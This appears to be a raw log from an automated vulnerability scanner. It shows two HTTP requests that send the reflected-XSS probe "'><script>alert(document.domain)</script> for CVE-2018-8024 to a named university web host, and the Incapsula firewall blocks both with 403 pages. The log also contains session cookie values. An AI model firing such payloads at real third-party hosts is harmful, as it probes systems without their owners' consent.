[CVE-2018-8024] Dumped HTTP request for https://cedrr.le.unimelb.edu.au/jobs/?"'><script>alert(document.domain)</script>


GET /jobs/?"'><script>alert(document.domain)</script> HTTP/1.1
Host: cedrr.le.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2018-8024] Dumped HTTP response https://cedrr.le.unimelb.edu.au/jobs/?"'><script>alert(document.domain)</script>

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 830
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3239149=mxZ6pgvmSY6K1FMuzudIAgRyk2gAAAAAQUIPAAAAAACWSdKdMHB1Hso7pt+AyJxd; expires=Thu, 06 Aug 2026 07:06:46 GMT; HttpOnly; path=/; Domain=.le.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_237_3239149=go7GbLvemU7C37arov5JAwRyk2gAAAAAMe0zia+XHqKrfSFl3d7TRQ==; path=/; Domain=.le.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 3-2162231-0 0NNN RT(1754493445202 9) q(0 -1 -1 -1) r(0 -1) B15(1,903758,0) U18

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/c-O-Scotland-Lady-Macb-Ile-And-Seyward-my-forge-" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=3-2162231-0%200NNN%20RT%281754493445202%209%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c903758%2c0%29%20U18&incident_id=237000430032579424-10823970436483779&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032579424-10823970436483779</iframe></body></html>
[CVE-2018-8024] Dumped HTTP request for https://cedrr.le.unimelb.edu.au:4040/jobs/?"'><script>alert(document.domain)</script>


GET /jobs/?"'><script>alert(document.domain)</script> HTTP/1.1
Host: cedrr.le.unimelb.edu.au:4040
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: visid_incap_3239149=mxZ6pgvmSY6K1FMuzudIAgRyk2gAAAAAQUIPAAAAAACWSdKdMHB1Hso7pt+AyJxd; incap_ses_237_3239149=go7GbLvemU7C37arov5JAwRyk2gAAAAAMe0zia+XHqKrfSFl3d7TRQ==
Accept-Encoding: gzip


[CVE-2018-8024] Dumped HTTP response https://cedrr.le.unimelb.edu.au:4040/jobs/?"'><script>alert(document.domain)</script>

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 941
Cache-Control: no-cache, no-store
Content-Type: text/html
Strict-Transport-Security: max-age=31536000
X-Iinfo: 12-10108152-0 0NNN RT(1754493445225 10) q(0 -1 -1 3) r(0 -1) B15(1,903758,0) U18

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script type="text/javascript" src="/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3"></script><script src="/c-O-Scotland-Lady-Macb-Ile-And-Seyward-my-forge-" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=12-10108152-0%200NNN%20RT%281754493445225%2010%29%20q%280%20-1%20-1%203%29%20r%280%20-1%29%20B15%281%2c903758%2c0%29%20U18&incident_id=237000430032707522-51995372317117132&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032707522-51995372317117132</iframe></body></html>
